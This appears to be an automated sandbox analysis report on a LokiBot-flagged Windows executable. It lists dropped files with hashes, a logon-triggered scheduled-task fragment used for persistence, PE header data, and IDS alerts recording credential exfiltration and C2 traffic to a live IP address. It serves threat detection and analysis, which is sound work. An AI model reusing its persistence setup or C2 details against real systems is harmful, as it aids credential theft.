NET1-ASBG	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	93.123.76.46
	efN78UF3Si.exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	94.156.177.166
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	filepdf.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	94.156.177.166
	putty .exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	94.156.177.166
	2.ps1	Get hash	malicious	Unknown	Browse	94.156.177.166
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZeJFfrYmOnJKS.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380192968514367
Encrypted:	false
SSDEEP:	48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:+LHyIFKL3IZ2KRH9Oug8s
MD5:	2E16D2F2BF61526793175AF057C80E38
SHA1:	C646E8FE846DE9B54BF04679A5A9F5216DD5C7B9
SHA-256:	BA86B69C37F37E218D33B2643466FD3C5D2551C0215ABC36883C7A2D75C9848C
SHA-512:	3E95DF7756044BB4CAFE391CB8860B551621923B795B80FE6753DD5B1D11B9DCB5F41938B65761D6D7EE5689471A0AA7CE3EAF38A03A50399FA29704294AD34E
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afwgsupc.i30.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5y2zi1h.gk2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebabrywo.lxv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrb43vfc.g4p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp

Download File

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116042999273181
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFexvn:cgergYrFdOFzOzN33ODOiDdKrsuTFSv
MD5:	35E222D80776A510B78E9F5F4F67A7FE
SHA1:	1C34B1007B6EF798E5A64CB3712DD9D6F13141DB
SHA-256:	E7FE5B635CDF58FB4D692FAD191A73DBA47AED8BAAE75F21139767041BD112B6
SHA-512:	5F510949C6ACAB4CEE6E978634D02AFA45C510A0B070B43A884B6F4587932D503CD2F83488413F270A05E8C474452E93BA39AFEF80BD7A958D75955976C05FD7
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116042999273181
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFexvn:cgergYrFdOFzOzN33ODOiDdKrsuTFSv
MD5:	35E222D80776A510B78E9F5F4F67A7FE
SHA1:	1C34B1007B6EF798E5A64CB3712DD9D6F13141DB
SHA-256:	E7FE5B635CDF58FB4D692FAD191A73DBA47AED8BAAE75F21139767041BD112B6
SHA-512:	5F510949C6ACAB4CEE6E978634D02AFA45C510A0B070B43A884B6F4587932D503CD2F83488413F270A05E8C474452E93BA39AFEF80BD7A958D75955976C05FD7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Download File

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601088
Entropy (8bit):	7.722792552372322
Encrypted:	false
SSDEEP:	12288:ho1zGksv+SGjpA3yKUUo6acZi1bRKrweUbLtBHCMcqH6U6PWuv04MadSEpl:C1zGUxjD1bRK3VMcqH6UqMUHpl
MD5:	2F402635E17B4F0D9C0D6922D384936A
SHA1:	2753A159F2CF160733B1CEEEDE1DB57D2DDE0375
SHA-256:	BFD4E29505627B76243C4EA34C07B22AF7EDC00391B112E78C2DC3CF7A48D742
SHA-512:	96EC3A719566A081B060ED3812F5411E637B7F3EA5E3306EFFBE44D8284016E153182109B4F3C035AA31E8CC350C472FCFB59F5579006B14E0797040B2AA5A44
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................0.."...........A... ...`....@.. ....................................@.................................pA..O....`..................................p............................................ ............... ..H............text....!... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................A......H.......PI..\'...........p..(..............................................}.....(.......(.......s#...}.....0............(.....s......o.....B..{......o%....B..{......o$.....0............{....(.......(....o.......0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.

C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FVR-N2411-07396.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.722792552372322
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	FVR-N2411-07396.exe
File size:	601'088 bytes
MD5:	2f402635e17b4f0d9c0d6922d384936a
SHA1:	2753a159f2cf160733b1ceeede1db57d2dde0375
SHA256:	bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
SHA512:	96ec3a719566a081b060ed3812f5411e637b7f3ea5e3306effbe44d8284016e153182109b4f3c035aa31e8cc350c472fcfb59f5579006b14e0797040b2aa5a44
SSDEEP:	12288:ho1zGksv+SGjpA3yKUUo6acZi1bRKrweUbLtBHCMcqH6U6PWuv04MadSEpl:C1zGUxjD1bRK3VMcqH6UqMUHpl
TLSH:	DBD401852A6BE902C4E28BB055A2C2F447385DDDED12C353DBD97DFF7D3A31A24802A5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................0.."...........A... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4941c2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD1D92115 [Fri Jul 25 11:18:45 2081 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x94170	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92ed4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x921c8	0x92200	b315e9fc71ba30c84d0ac2ce4b879081	False	0.9096182634730539	data	7.731637245415364	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0x59c	0x600	b7b7459aab57886443e950902dd615f9	False	0.41796875	data	4.064003262536425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0xc	0x200	2648a2a48de7e8802887965b9cb2a35c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x96090	0x30c	data			0.4371794871794872
RT_MANIFEST	0x963ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-28T13:51:55.400275+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49824	TCP
2024-11-28T13:52:04.479690+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:04.479690+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:04.479690+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:05.944288+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:07.903841+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:09.514500+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:09.634906+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49711	TCP
2024-11-28T13:52:10.072483+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:10.072483+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:10.072483+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:11.594715+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:11.714786+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49712	TCP
2024-11-28T13:52:11.973667+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:11.973667+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:11.973667+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:13.292548+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:13.412589+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49713	TCP
2024-11-28T13:52:13.689499+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:13.689499+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:13.689499+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:15.014454+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:15.135212+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49714	TCP
2024-11-28T13:52:15.393770+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:15.393770+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:15.393770+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:16.819103+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:16.939118+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49715	TCP
